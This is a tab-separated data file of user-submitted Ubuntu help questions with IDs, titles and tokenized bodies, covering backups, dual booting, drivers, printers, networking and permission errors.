473633	backup without overwriting old backups	i 'm using ubuntu server 14.04 to backup all data from '/mnt/test/ folder ' to '/home/john/ ' with tar and archive to stuff.tar.gz and to make it to backup automatical . i use cron to backup it every week so what if i want to use cron to create an additional backup file instead of overwriting the existing one ? so , after month i 'd have 4 backups , each with a unique name . is there a way ? script ar other backup tool what would do that ?
473636	use 12.04 greybird 's theme in 14.04	i would like to use the default theme ( greybird ) from xubuntu 12.04 in xubuntu 14.04 , simply because i believe the older version of greybird is prettier . i attempted to copy the contents of /usr/share/themes/greybird of my 12.04 installation and placed them on my 14.04 installation . however the theme did not load right . is there a way to use the old greybird theme from xubuntu 12.04 on xubuntu 14.04 ?
473641	make boot partition using gparted in boot-repair	how do i create a bios boot partition with g parted ? i am using boot repair .
473642	need download version for i686	i am trying to install ubuntu-14.04-desktop-i386 on a dell dimension 4600 . i get a message - this kernel requires an i86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for you cpu . this was the only 32 bit version i found to download . how can i find the appropriate download version ?
473647	is `` running '' ubuntu live a reliable way to predict how my computer will act on actual install ?	i 'm trying to ditch windows for ubuntu on my samsung netbook but first i want to know if the computer is `` ready '' for the transition . so , if i run ubuntu live on my computer , how this is a good way to predict how my computer react to the actual leap . if , say , wifi worked fine with the live version , does this mean that it will work as great later ?
473648	auto mount sshfs volume through fstab with password auth	i have a headless server running ubuntu 12.04.4 that needs to come back up after a reboot without user intervention . there is an existing manual process that involves looking at files on a remote server over sftp and manipulating certain ones . the auth for the sftp site uses a username and password . i want to automate this process by removing the manual step of getting into the sftp server by mounting the remote volume directly on the server that needs the files . note that i do not have a ssh identity file because key based auth is not being used . i can not change the remote end to use key auth ; i need to use the existing username and password . most of the guides i 've found out there only deal with using a key based identity file . current fstab config : sshfs # username @ secureftp.example.net : /secureftp /my/localpath fuse allow_other , uid=root , gid=clientfiles , umask=0770 when mounting interactively , it prompts for the password . i need the server to be able to recover from a reboot without having someone there to babysit and type the password in , so it needs to work without any prompting . i do n't know how to get the password in aside from the prompt . ideally , i could specify a credential file with the username and password like i can with the credentials= < file name > cifs option . i 've tried credentials= and password= as mount options but they do n't seem to be defined for sshfs ; i get fuse : unknown option . there is a password_stdin option for sshfs but i 'm not sure how that applies in fstab .
473651	no network capabiity on dell vostro 1000	i just had a fresh install of ubuntu 14.04 and i have no network connectivity , i have a wifi capable computer , but there is no wifi connectivity , and the ethernet is not functioning either . i suspect missing drivers , but i do n't know where to get them .
473653	problem when trying to install windows 8.1 alongside ubuntu 14.04	i am trying to dual a new pc i just got that comes with an asus motherboard . first thing i done was disabled secure booth and fast booth . then i shrunk the partion in windows 8 . then i went to install ubuntu from my usb disk and as there is no option to install it alongside windows i chose something else . my problem is that in the partion table it only shows 1 partion with with around 936 gb of unalocated space and does not recognise any of the windows partions . when using gparted i get this error message : libparted warning /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partion table , as it should . perhaps it was corrupted â posssibly by a programthat does n't understand gpt table , and are now using an msdos partion table . is this a gpt partion table ? i have already ignored this and contiued to set up the ubuntu partions following this guide http : //www.everydaylinuxuser.com/2014/05/install-ubuntu-1404-alongside-windows.html which didnt work so i have reinstalled windows again to start over .
473655	what is the meaning of ax in ps ax	i know when you type sudo ps ax , that list all of the running process on the system . but want to know what is ax ? what ax stand for ? is that abbreviation ?
473656	emulating xbox 360 controller using xboxdrv not working for dualshock controller on 14.04	i had been happily using my ps3 controller emulated to an xbox 360 controller on my ubuntu 13.10 and lower steam library . i recently updated to 14.04 , and now xboxdrv just does not work anymore . this is what i do : plug in ds3 into usb port click the playstation button on it it shows all 4 leds lighting at the same time slowly sudo xboxdrv -- detach-kernel-driver this is the output : controller : playstation ( r ) 3 controller vendor/product : 054c:0268 usb path : 003:004 controller type : playstation 3 usb your xbox/xbox360 controller should now be available as : /dev/input/js4 /dev/input/event15 and then the player 1 led lights up . but after about 3 seconds , the 4 leds start lighting slowly again and the controller does not seem to do anything . i use jstest-gtk to see if input is being registered correctly but nothing happens when i click any of the buttons . as i said , i had been using this method up until 14.04 , and it was working flawlessly . has anyone been able to get xboxdrv to work with a dualshock 3 controller on 14.04 ?
473660	brightness keys no longer work	my fn+f8 and fn+f9 keys to change the screen 's brightness appear to no longer work on my thinkpad laptop . # ls /sys/class/backlight/ thinkpad_screen some guide told me to make this : # cat /usr/share/x11/xorg.conf.d/20-intel.conf section `` device '' identifier `` card0 '' driver `` intel '' option `` backlight '' `` intel_backlight '' busid `` pci:0:2:0 '' endsection and someone else said to do this : # cat /usr/share/x11/xorg.conf.d/20-nvidia.conf section `` device '' identifier `` nvidia '' driver `` nvidia '' option `` nologo '' `` true '' option `` registrydwords '' `` enablebrightnesscontrol=1 '' endsection this is my grub cmdline_linux_default line , in case it 's relevant : grub_cmdline_linux_default= '' nosplash nomodeset acpi_osi=linux acpi_backlight=vendor '' the ubuntu wiki page on backlight issues says add just kernel parameters thinkpad-acpi.brightness_enable=1 acpi_backlight=vendor to /boot/grub/menu.lst . execute : sudo update grub but i do n't have a menu.lst and i suspect this is outdated . doing something like this does not work : echo 10 > /sys/class/backlight/thinkpad_screen/brightness any ideas ?
473661	use amd/intel switchable graphics program on specific programs like in windows ?	thanks for viewing . i am dual-booting ubuntu 14.04 lts_x64 along winodws 8.1_x64 with : processor : intel core i7-3635qm and intel hd4000 integrated chip amd radeon hd 8770m in windows , the amd switchable graphics program lets me choose which programs use which video card , but in ubuntu it seems i can only download the catalyst control center which lets me choose which graphics card to use all the time unless i go and change it . i installed the fglrx package and then the fglrx-update , that did n't work so i had to install the lastest drivers for the amd card straight from amd 's website . that lets me open the control center , is this the only thing i can get for ubuntu ? is there any way that i can choose which programs use which card ?
473663	`` selected bootable device failed '' error dual boot ubuntu alongside windows8.1	i have an hp laptop , which runs windows 8.1 i wanted to dual boot ubuntu 14.04 with windows 8.1 i disabled secure boot and fast startup then used a liveusb to boot then an error msg pops up saying `` the selected bootable device failed '' my system boot order is : os boot manager usb hdd internal hdd why is `` selected boot device failed '' popping up and should i try to keep usb hdd on the top of my system boot order in order to get it working ?
473665	chrome could not load google talk plugin	my chrome version is 35.0.1916.114 in ubuntu 14.04 . i tried the .deb package in google talk plugin website and the method in the last post of this https : //bugs.launchpad.net/ubuntu/+source/chromium/+bug/1302793 . however , the problem still exists . how can i solve it ?
473668	i cant acess my hdd	first of all , i 'm a total linux noob . i was running the latest version of ubuntu but eventually i was n't able to boot no more , the ubuntu logo appeared and then it was only a blinking white bar indefinitely , without charging . now , my problem is the following . i want to do a fresh install and i am trying to recover my latest files from the hdd using the ubuntu live cd . i click on the hdd and obtain the following i honestly do n't really know whats going on . looking at disks i have this ... can anyone help me out ? cheers .
473671	pycharm pro and ubuntu	i have installed pycharm on ubuntu 14.04 using this useful guide . however the installation is the community one and i 'd like to get the pro version for which i have a licence . is there any way to upgrade or is it a case of uninstall and then follow this guide which is much more hassle , but compatible with the download available at the jetbrains site .
473676	permission denied errors while starting namenode in hadoop 2.2.0	i recently installed hadoop2.2.0 on my desktop running : linux livingstream 3.2.0-29-generic # 46-ubuntu smp fri jul 27 17:03:23 utc 2012 x86_64 x86_64 x86_64 gnu/lin i am able to format the namenode just fine , however when i start the namenode using the following command : hadoop-daemon.sh start namenode i get the following permission errors , can anyone please help me with these errors : hduser @ livingstream : /usr/local/hadoop $ hadoop-daemon.sh start namenode mkdir : can not create directory `/var/run/hadoop ' : permission denied starting namenode , logging to /var/log/hadoop/hduser/hadoop-hduser-namenode- livingstream.out /usr/sbin/hadoop-daemon.sh : line 138 : /var/run/hadoop/hadoop-hduser-namenode.pid : no such file or directory can you please help me with these errors ?
473678	looking for a way to give acces to some programs for a limited period of time	i install linux on computers and add to the base installation some other programs . this computer then is sold to a customer as a larger instrument . now , i am looking for a way to implement some kind licence for this computer so the user can use it for a year and then he would need to `` renew '' the licence . it is not my intention to lock the whole computer , blocking or deleting some folders should be enough . the only way i could think of was to setup a cron job that deletes my programs , or a second way would be to set the user account to expire after a year . but i give the computer with sudo privilages so the above solutions would n't be 100 % safe . it is not my intention to encrypt any code , i just want block the possibility to execute certain programs . is there a way or a program that would `` licence the computer '' ? ideally it should be invisible to the user . after one year the program stops working and `` he does n't know why . ''
473679	sound cuts out at random times	since i updated to 14.04 , i have been having a problem with my sound . every once in a while it `` skips a beat . '' and when i say every once in a while , i mean 2-4 times a minute . it 's literally that the sounds goes a way for about half a second . it does n't pick up where it left off , but rather continues from where it should be ... if that makes sense . so , if it cut in mid word , i would n't hear the end of the word . i did n't have this problem before i updated from 12.04 . there is no popping or static , it just cuts for a fraction of a second . any thoughts ? thanks !
473680	gstreamer pulseaudio echo cancellation	i 'm implementing a voip application using gstreamer , i use the example of the rtp in the plugin-good ! i want to implement echo cancellation , i could n't use the speex echo canceller with gstreamer because the input and the output are not in the same process . so , i want to use pulse audio to make echo cancellation ? can any one help me how to deal with ? the sender voice is pipeline = gst_pipeline_new ( null ) ; g_assert ( pipeline ) ; /* the audio capture and format conversion */ audiosrc = gst_element_factory_make ( pulsesrc , `` audiosrc '' ) ; g_assert ( audiosrc ) ; audioconv = gst_element_factory_make ( `` audioconvert '' , `` audioconv '' ) ; g_assert ( audioconv ) ; audiores = gst_element_factory_make ( `` audioresample '' , `` audiores '' ) ; g_assert ( audiores ) ; /* the encoding and payloading */ audioenc = gst_element_factory_make ( audio_enc , `` audioenc '' ) ; g_assert ( audioenc ) ; audiopay = gst_element_factory_make ( audio_pay , `` audiopay '' ) ; g_assert ( audiopay ) ; /* add capture and payloading to the pipeline and link */ gst_bin_add_many ( gst_bin ( pipeline ) , audiosrc , audioconv , audiores , audioenc , audiopay , null ) ; if ( ! gst_element_link_many ( audiosrc , audioconv , audiores , audioenc , audiopay , null ) ) { g_error ( `` failed to link audiosrc , audioconv , audioresample , `` `` audio encoder and audio payloader '' ) ; } and the receiver is : gst_bin_add_many ( gst_bin ( pipeline ) , rtpsrc , rtcpsrc , rtcpsink , null ) ; /* the depayloading and decoding */ audiodepay = gst_element_factory_make ( audio_depay , `` audiodepay '' ) ; g_assert ( audiodepay ) ; audiodec = gst_element_factory_make ( audio_dec , `` audiodec '' ) ; g_assert ( audiodec ) ; /* the audio playback and format conversion */ audioconv = gst_element_factory_make ( `` audioconvert '' , `` audioconv '' ) ; g_assert ( audioconv ) ; audiores = gst_element_factory_make ( `` audioresample '' , `` audiores '' ) ; g_assert ( audiores ) ; audiosink = gst_element_factory_make ( pulsesink , `` audiosink '' ) ; g_assert ( audiosink ) ; /* add depayloading and playback to the pipeline and link */ gst_bin_add_many ( gst_bin ( pipeline ) , audiodepay , audiodec , audioconv , audiores , audiosink , null ) ; res = gst_element_link_many ( audiodepay , audiodec , audioconv , audiores , audiosink , null ) ; g_assert ( res == true ) ; i tried to change gstreamer proprietes to pulseaudio server in input and output and i used `` pactl load-module module-echo-cancel aec_method=adrian '' but i still listen to echo ! ! any one could help please thanks ! !
473682	can ubuntu for tablets run java applets ?	can ubuntu for tablets run java applets in browser ? my bank has netbanking build in java and i need to use it on my android tablet which does not support java browser applets . do n't have experience with linux ( i am windows user ) , and do n't know much about java support on linux . i do n't need to run native android apps , just need to install jre on ubuntu for tablets ( first install ubuntu on my android tablet , asus transformer pad tf300t ) and run that applet . is that possible ?
473684	remove activities window overview on gnome3	whereas i use windows list extension , how can i remove activities windows overview and replacing that with the default gnome menu ?
473693	run a script when power button is pushed	i 'm trying to run a script once i push the power button instead of having my machine turn off . i 'm running ubuntu server 13.04 , but any answers also need to work on server 14.04 . i 've looked at acpi events and such , tried editing the /etc/acpi/powerbtn.sh and /etc/acpi/events/powerbtn files but no luck anywhere . so then i after reading this page https : //wiki.archlinux.org/index.php/acpid , i ran sudo journalctl -f as instructed , but that did n't work . so i tried sudo acpi_listen and i got into the acpi event listener . however , even from in there , pushing the power button gave me no output at all . is there another service in place which catches the power button events before acpi ? what files would i then need to edit to execute my script when the power button is pushed ? i 've also tried sudo xev and that gave me no output on the power button either . edit : i also have a ubuntu desktop system and on that system i can get output from acpi and i can edit the /etc/acpi scripts . is there something installed with unity that miraculously enables acpi ? edit again : ended up doing a fresh install ... acpi worked . i guess i messed something up when i was experimenting and first tried to find a solution to this problem . what i did was place my python script in /etc/acpi/ and then added the following two lines to the top of /etc/acpi/powerbtn.sh sudo python my_python_script.py exit 0 and it worked . thanks guys .
473695	encryption of partition for dual boot setup	i would like to get windows 7 along ubuntu 14.04 on separate disk partitions where windows partition is encrypted . what are the options to get this type of setup starting from empty disk drive ?
473696	usb not showing up as boot option	i just bought an asus x551 that came with windows dos which i 'm not familiar with . i had installed ubuntu on my former laptop but i did it on windows 7 . i followed the instructions i found and created a bootable usb drive but it does n't show as a boot option . please help .
473697	how do i build bitcoin from source on ubuntu 14.04	( using autotools ) i have downloaded the bitcoin source from `` bitcoin core version 0.9.1 '' when i input the following command ./autogen.sh it produces the following warning : includes ' is the old name for 'am_cppflags ' ( or '*_cppflags ' ) . when i attempt ./configure i get the following error message : configure : error : found berkley db other than 4.8 , required for portable wallets ( -- with-incompatible-bdb to ignore ) . and lastly , when i input make i get the output of : make : * no targets specified and no makefile found . stop .
473698	ubuntu 14.04 denying incoming access	i just install a counter-strike : source dedicated server on my ubuntu 14.04 desktop amd64 and i 'm having trouble to allow incoming access to this server from the internet . i did a port forwarding on my router to make 192.168.1.100 ( lan addr ) handle incoming connections on port 27015 over tcp and udp . sadly , when i try to establish a remote connection on this port i 'm getting a message of 'connection refused ' . i did the exact same procedure on windows 7 with windows firewall disabled and i have succeeded . i also tried to disable ufw and make some rules on iptables but nothing working so far . some results of my network access tests ... nunesvictor @ nunesvictor-not : ~ $ netstat -ln conexões internet ativas ( somente servidores ) proto recv-q send-q endereço local endereço remoto estado tcp 0 0 127.0.1.1:27015 0.0.0.0 : * ouça tcp 0 0 127.0.0.1:3306 0.0.0.0 : * ouça tcp 0 0 127.0.1.1:53 0.0.0.0 : * ouça tcp 0 0 127.0.0.1:631 0.0.0.0 : * ouça tcp6 0 0 : ::80 : : : * ouça tcp6 0 0 : :1:631 : : : * ouça udp 0 0 0.0.0.0:27015 0.0.0.0 : * udp 0 0 0.0.0.0:27020 0.0.0.0 : * udp 0 0 0.0.0.0:36710 0.0.0.0 : * udp 0 0 127.0.1.1:53 0.0.0.0 : * udp 0 0 0.0.0.0:631 0.0.0.0 : * udp 0 0 0.0.0.0:49971 0.0.0.0 : * udp 0 0 0.0.0.0:5353 0.0.0.0 : * udp 0 0 0.0.0.0:5353 0.0.0.0 : * udp 0 0 0.0.0.0:26901 0.0.0.0 : * udp 0 0 0.0.0.0:27005 0.0.0.0 : * udp6 0 0 : ::5353 : : : * udp6 0 0 : ::34125 : : : * nunesvictor @ nunesvictor-not : ~ $ sudo nmap -p 27015 -su 192.168.1.100 starting nmap 6.40 ( http : //nmap.org ) at 2014-05-28 20:22 brt nmap scan report for 192.168.1.100 host is up . port state service 27015/udp open|filtered halflife nmap done : 1 ip address ( 1 host up ) scanned in 2.15 seconds nunesvictor @ nunesvictor-not : ~ $ sudo nmap -p 27015 -su [ my real ip address ] starting nmap 6.40 ( http : //nmap.org ) at 2014-05-28 20:23 brt nmap scan report for [ my real ip address ] host is up ( 0.0033s latency ) . port state service 27015/udp closed halflife nmap done : 1 ip address ( 1 host up ) scanned in 1.83 seconds so , what 's going on with this thing ? !
473699	difference between windows 8 and ubuntu 13.10 cloud storage	what is the difference between windows 8 and ubuntu 13.10 cloud storage ?
473700	ip switched to dhcp on reboot on ubuntu	i try to set a static ip with the following stanza in /etc/network/interface auto lo iface lo inet loopback allow-hotplug wlan0 iface wlan0 inet manual wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf auto eth0 iface eth0 inet static address 172.30.0.95 netmask 255.255.255.0 gateway 172.30.0.1 with this file and doing sudo ifdown eht0 sudo ifup eth0 the static ip is configured just fine . however , whenever i reboot dhcp takes over , and replaces the above file with the following auto lo iface lo inet loopback allow-hotplug wlan0 iface wlan0 inet manual wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf auto eth0 iface eth0 inet dhcp ( it also keeps a backup of the existing file ) . i want to be able to choose with /etc/network/interface if my machine has a static of dhcp configuration . i have n't experienced this problem with other ubuntu installations . in other cases when there the ip is statically set in interfaces , it stays like that and dhcp does n't start on boot .
473701	raid10 : how to tell which disks are in mirror ?	when i do `` cat /proc/mdstat '' , there seems no such information as to tell which disks are in mirror . % cat /proc/mdstat md126 : active raid10 sda1 [ 0 ] sdd1 [ 3 ] sdc1 [ 2 ] sdb1 [ 1 ] ... near-copies thanks for the hint . does `` near-copies '' implies sda1 and sdd1 are mirror , and so are sdc and sdb ? add : it looks like the same question has been raised before ( http : //serverfault.com/questions/200725/mirrored-and-stripped-hd-drives-in-raid10 ) and seems no clear answer . first , the number [ # ] beside each device seems to be related to the order in which they appear in `` mdadm -- create '' , do n't know why '/proc/mdstat ' has to order them strangely . if so , then by `` near-copies '' , it might be concluded that 'sda1 ' and 'sdb1 ' are in mirror , and so are 'sdc1 ' and 'sdd1 ' , correct ? add : and it was ( partially ) confirmed by the test here ( http : //www.linuxquestions.org/questions/linux-server-73/software-raid10-does-the-disk-order-in-mdadm-matter-671016/ ) .
473703	wifi not working with asus x551 and ubuntu	i just bought an asus x551 and installed ubuntu but the wireless connections ca n't seem to work . any ideas why this is happening ?
473707	former windows xp systems are slow after installing 14.04	i just replaced windows xp on our work computer with ubuntu 14.04 32-bit , and it runs really slowly , only after logging into an account and the screen sometimes flashes . it does n't fill the whole screen , as if the screen has trouble displaying it . when in the settings , when i hover over an item the rest of the items scramble as if there is a graphics problem . i really like this software and want to make it work -- any ideas ? the os is installed on the hard disc and completely replaced windows xp . it 's fresh , no other file changes .
473708	ubuntu 14.04 lts bluetooth does not function , can not establish an audio sink connection	i have tried remedies describe in questions relating to `` no a2dp streaming audio to bluetooth headsets '' on various ubuntu version . none worked . after following re-loading of bluez and pulseaudio packages suggestions , all i was rewarded with was a non-funcional rhythmbox while the headset was connected . the bottom line is that there is basic functionality issues with these applications ( packages ) . need help . thanks in advance
473711	ubuntu 14.04 with hondata software for windows	i have installed ubuntu on my laptop . it works fine . i had this program called `` hondata kpro '' that would allow me to datalog information from my car 's ecu and tune it . i downloaded it from here http : //hondata.com/ssoftware.html and tried to install it , but it fails . is this software not compatible with ubuntu ? thanks
473715	screen refresh/display problem in xubuntu 14.04	i have just installed xubuntu 14.04 as a dual boot on a desk top ( pentium r 4 cpu , 2.66 ghz , 2g ram ) running xp home edition . in some situations when in xubuntu i am having what seem to be screen refresh problems . when i open file manager or settings manager the text names of various apps display but most of the icons do not . moving the mouse over an app name generally causes the icon to appear , but it often vanishes once the mouse pointer is moved . this issue occurs irrespective of the view setting . icons appear fine in the menu that comes up when i right click in the desktop , and in the menu that comes up when i click the mouse icon at top left . what i suspect is a related issue . in abiword text sometimes fades , disappears or does not display immediately when i type , or text of the whole document fades . it then comes back or darkens if i left click a few times on the text . if i scroll through a document the text often fades and may remain faded until i left click a few times .
473719	burg working , but themes are n't	it worked before , but for some reason now i ca n't change the booting visual anymore . when i run burg-emu on terminal , this appears : ( http : //s15.postimg.org/qyu33jx9n/screenshot_from_2014_05_28_21_55_23.png ) this is exactly how it looks like when i boot the pc . but i ca n't press f2 or any other key to select a theme . i tried to change it by opening the super-boot-manager already , still did n't work . any help ? i 'm using ubuntu 14.04 linux 3.13.0-24-generic # 47-ubuntu smp x86_64 x86_64 x86_64 gnu/linux
473721	how to change ubuntu 14.04 drum beat tone ?	i want to change the drum beat tone in my ubuntu 14.04 and replace it with a new one . so i downloaded a new tone . i searched in google to do this and i tried 4-5 links i found . but nothing happened , the drum is still beating . actually is the drum beat start up tone or system ready tone ? can anyone tell the correct procedures to change the drum beat tone in 14.04 ?
473727	eliminating zero-length files	i have been having multiple crashes recently . 4-5 last night within a few hours . i posted about it before , and got an answer but not sure how to proceed . the messages in my logs right before the crash are multiple complaints about valid ecryptfs headers . but the chron might not be related , i do n't think i saw that in previous crashes : xxx-desktop kernel : [ 1112.274474 ] valid ecryptfs headers not found in file header region or xattr region , inode 32376924 xxx-desktop cron [ 4212 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) so i was sent to an answer providing this script : for i in find $ ( mount | grep `` on $ home type ecryptfs '' | awk ' { print $ 1 } ' ) -size 0c ; do if ! fuser -v $ i ; then rm -f $ i fi done i did find some zero byte files , not in the exactly right place ( a folder called .private as i remember ) , but i need to fix this , its too bad right now . so i need to delete any of them that are not in use . i am a little too clueless , can someone walk me through executing this script ? i do n't know how .
473728	making canon lbp6000 printer work under ubuntu 14.04 64-bit	previously , i have successfully used this canon lbp6000 printer under ubuntu 12.04 ( 32-bit ) . recently , i upgraded to ubuntu 14.04 ( 64-bit ) . already several hours have been wasted making this printer work under this system , without success . ( i have already seen this question . but thought it better to post a new one since my observations are too long to fit as a comment . there is a similar issue in this one . ) steps so far the radu script did not work . got something in the line of `` ccp , unknown uri '' . downloaded and installed the latest driver from canon . installed the .deb files found in linux_capt_printerdriver_v260_uk_en/64-bit_driver/debian sudo dpkg -i cndrvcups-c* ( did not use the michael ppa since i was actually downloading the latest driver from canon site . ) installation went without any problem . started cups in a browser . http : //localhost:631/ . the printer was automatically detected as canon lbp6000/lbp6018 . moved forward and selected canon lbp6000/lbp6018 capt ( us ) as the driver . got it installed . the printer uri is shown as usb : //canon/lbp6000/lbp6018 ? serial=0000b1c4i3gu now , when i try printing a test page , the cups window says that `` sending data to printer '' . in about a minute , this job is shown as completed , though nothing gets printed . the official ubuntu page lists lbp6000/lbp6018 as a supported printer with driver cncupslbp6018captk.ppd under ubuntu 13.10 ( 64bit ) /12.10/12.04 ( 32bit ) . so , previously , there has been success with 64-bit versions . update 1 as suggested here , executed find . -name \*.so\* -exec ldd { } \ ; |grep not in the extracted driver directory . got an output in the line of libcncaptnpm.so.1 = > not found libstdc++.so.6 = > not found executed sudo apt-get install lib32stdc++6 . now the message is reduced to the one for libcncaptnpm only . do not know how to install this one . apt-cache search libcncaptnpm returns an empty answer . any chance i can directly use the libcnaccm.so.1.0 file found under linux_capt_printerdriver_v260_uk_en/src/cndrvcups-capt-2.60-1/libs ? update 2 ( solved ) i followed the procedure described in this answer . ( though i had downloaded the drivers directly from canon site . ) now my printer prints again . big sigh of relief . the next printer i will buy will not be a canon . the hassle i had to go through was perhaps acceptable twenty years back . in this era , i will want my printer to simply plug-in and work . observations when i submit the first print job in a login session , it waits . the queue says , processing since ... .. then i need to kill the ccpd and captmoncnabc processes and start the ccpd daemon again . wonder why i have to do it . actually , i made a script for that . # ! /bin/bash pkill -9 -x ccpd pkill -9 -x captmoncnabc /etc/init.d/ccpd start /etc/init.d/ccpd status
473733	canon imageclass mf3110 printer wont print	i set up the printer but when i click print it doesnât print i tried it on scan and on copy and nothing happens what do i do
473736	printer not printing but recognized by computer	i currently have an hp laserjet 1022 on my ubuntu 14.04 . when i tried to print from pdf is said usr/lib/cups/backend/hp not available . is there a way to fix this ?
473737	ubuntu touch on nexus 4	i have finally managed to install the ubuntu touch on my nexus 4 . now the problem is its very laggy . i have installed the `` trusty '' latest channel and its quite messy . change background is not working . dialer is really slow and everything is messed up . but i have seen many videos of nexus 4 and everything is working smoothly . so do i have to change to or pick any specific channel for installation ? please tell me is their any stable and properly working channel which i should choose for installation or what should i do ?
473740	dell inspiron 3421 's wifi is not working on ubuntu 14.04 ?	i have installed ubuntu 14.04 on my dell 3421 laptop but my wifi is not working . it is showing it has a proprietary driver , how do i get it to work ?
473741	home deleted by rm command , can not login	i tried to use rm to format a pendrive but it also deleted everything inside my home folder . now i ca n't even login anymore . also , pressing shift on boot wont enter in recovery mode . i have the ubuntu installer on a bootable pendrive , thought . edit : now i can access recovery mode and login as root . edit 2 : i do n't really need to get my deleted files back , because i only had wallpapers on my account . i just want to be able to login again .
473742	installing composer globally permission denied	i 'm following the steps in get composer.org and i want to install composer globally and give me this error . mv : can not move ‘composer.phar’ to ‘/usr/local/bin/composer’ : permission denied so what i 'm missing here ?
473749	apt-get update error 'e : malformed line 1 in source list /etc/apt/sources.list.d/google.list ( dist parse ) e : the list of sources could not be read '	i am using ubuntu 14.04 and in terminal when i run : sudo apt-get update my terminal gives me an error of : e : malformed line 1 in source list /etc/apt/sources.list.d/google.list ( dist parse ) e : the list of sources could not be read . when i was trying to install google chrome , my internet connect became lost during the download and did n't install correctly , now i can not get apt-get update to operate at all . i am fairly new to using any type of linux os , so please help me fix this issue .
473750	sending files from win8 pc to ubuntu14.04 laptop	i want to transfer some files from a pc with windows 8 to my laptop with ubuntu14.04 via wifi lan.but i do n't know what to do . i already can connect to internet via the wifi network of my modem-router but i do n't know how to connect to the pc.can anyone help ? i searched internet and this site for a similar question but found nothing . thanks
473757	how to change documentroot to /var/www/public ?	i 'm new to lamp and i follow the steps on installing laravel here and it says now search for “allowoverride none” ( which should be there two times ) and change both to “allowoverride all“ . search for these two lines now i run sudo nano /etc/apache2/sites-available/default then it gives me this and then its says change this documentroot /var/www < directory /var/www > to this documentroot /var/www/public < directory /var/www/public > edit : ls -l /etc/apache2/sites-available and so i 'm stuck on it . so how can i do that ? i 'm new to lamp and laravel .
473764	can not install ubuntu	i tried to install ubuntu but when i boot up my machine , ubuntu logo display neatly in boot up installation , then suddenly full display went green blurry i ca n't see any text clearly . i tried once again to install ubuntu but this error showed every time when i tried that . details about my computer : operating system windows 8 64 bit motherboard ga-h61m-s2p intel速 h61 chipset processor intel processor i5 2310 memory ( ram ) 4.00 gb graphics radeon hd 7730 1gb primary hard disk 55gb free ( 184gb total ) please help me !
473766	burning iso to usb in ubuntu on mac hardware	i am trying to `` burn '' ( yes i know thats not the right term ) an iso for xubuntu onto my usb pendrive . i am on mac hardware but i have ubuntu installed and i would like to be able to do it without having to boot into mac os x. i have tried unetbootin and sudo dd if=xubuntu.iso of=/dev/sdb1 but none of them worked . any help is greatly appreciated . thanks additional info : i am on an intel mac , not one of those old powerpc things . it is a mid 2012 ( i think ) macbook pro
473771	installing ubuntu on a lenovo system with a new drive	i 'm a newbie . i 'm putting in a new drive ( no os installed ) in my lenovo t400 laptop . can i boot from my cd drive with the latest ubuntu image and install it to the new drive that has no os ? any specifics i should be aware of ? thank you .
473773	`` @ reboot '' command are not function properly	i have installed in my laptop ubuntu 12.04 lts operating system and it working fine , problem only that my file backup script not work properly , because of @ reboot command not function properly . without @ reboot command it working fine . can you help me to resolve this problem . @ reboot rsync -a -e ssh /home/abc/documents root @ 192.168.0.00 : /media/data/testbkp/it/abc
473774	inversion software related problem	i am using ubuntu 12.04.4 lts , and i 'm trying to install inversion program in my system but it is showing this problem fatal error : this program was not built to run in your system . please verify that both the operating system and the processor support intel ( r ) avx the strange thing is that its working on other system with same configuration .
473776	14.04 download version	i want to download a 64 bit ubuntu version for a toshiba , not a mac . when i download what the download site says is a 64 bit version ( not the mac version ) , its properties still read as 64 bit amd . what do i do to get the right version ?
473779	how can i access and backup ~/.gvfs and ~/.cache/dconf ?	i am creating backup and after completion i got this.. could not back up the following files . please make sure you are able to open them . /home/vinay/.cache/dconf /home/vinay/.gvfs i through terminal to open these file using cd /home/vinay/.cache/dconf it shows bash : cd : /home/vinay/.cache/dconf : permission denied how can i get access to these files ? is it fine to get permissions or leave as it is and not creating any backup for these files ?
473784	battery indicator has disappeared from gnome panel	i 'm using gnome flashback ( still the best ! ) on ubuntu 14.04 . in the indicator app , it used to always show the battery level indicator . now , it 's missing entirely : i 've looked in the power settings to make sure it 's set to show no matter what : i assume `` when battery is present '' means `` show the battery indicator whether charging or plugged in or whatever , just as long as the physical battery is in the laptop . '' i also tried the other option , `` when battery is charging or in use '' , but that doesn : t make a difference . the battery indicator was there consistently since upgrading to 14.04 a month ago , and has only started to be shy about appearing within maybe the last few days . so far as i know , i have n't done anything to alter any settings regarding power or indicators or applets that would have any impact on this . why is my power indicator missing , and how do i get it back ?
473787	ubuntu 14.04 failed to install	i ca n't boot from any ubuntu boot device . i downloaded ubuntu-14.04-desktop-amd386.iso and i did the following : burned .iso to a flash drive using universal usb installer ( that was recommended from www.ubuntu.com ) tried to use other programs like unetbootin and ultraiso used another flash drive used other laptops and pcs flash boot with windows oss i also tried with dvd .iso burn your advice please .
473789	wrongly removed wine	i removed wine from my computer using this command `` sudo apt-get purge wine* '' and most of my program files were removed too , is there a way i can repair this without necessarily re-installing ubuntu .
473792	ext2-ext3 drives permission	i need to format a drive with ext2 or ext3 file system and copy a film dcp on it . i 've used gparted to format the drive but can not copy the dcp into the drive as it says i do not have the permission . i 'm using ubuntu 14.04 with a live dvd to boot . disks gives me the option to format only on ext4 which is no good for me . i did try to format with ext4 and i can copy just fine but the drive has to be ext2 or 3 . i 'm very new to ubuntu , please help ! thanks !
473793	manually install dynamic application like android studio for all users ?	i read that applications can be added to /opt and then symlinked from files in /usr/local/bin to make them accessible to all users . i tried doing that manually with android studio by extracting the tar file to /opt and creating a desktop entry for it in /usr/share/applications/ . but i noticed that unless i run it as sudo from the terminal , it does n't work as expected ( bugs while finding sdk and existing projects ) . i guess this is because android studio is not a static application , and tries to access files in its own folder . and the same problem occurs when i start it from the launcher . is there a default way to do this to make android studio work for all users , like google chrome for eg . ?
473794	conky taking focus off ubuntu desktop ( 14.04 )	whenever i close all of any open windows , the ubuntu desktop is not brought back into focus and the title bar stays blank . due to this , the key combos , the power key , the media keys dont work . i found that this problem only exists when conky is running and it takes focus off desktop . though a right click on desktop solves the issue but it is a bit irritating to do this each time when i close a window . i already tried to get it out of focus using ccsm but it didnt help . i also tried to configure conky trying all of these own_window yes own_window no own_window_type normal own_window_type desktop but that too didnt solve the issue .
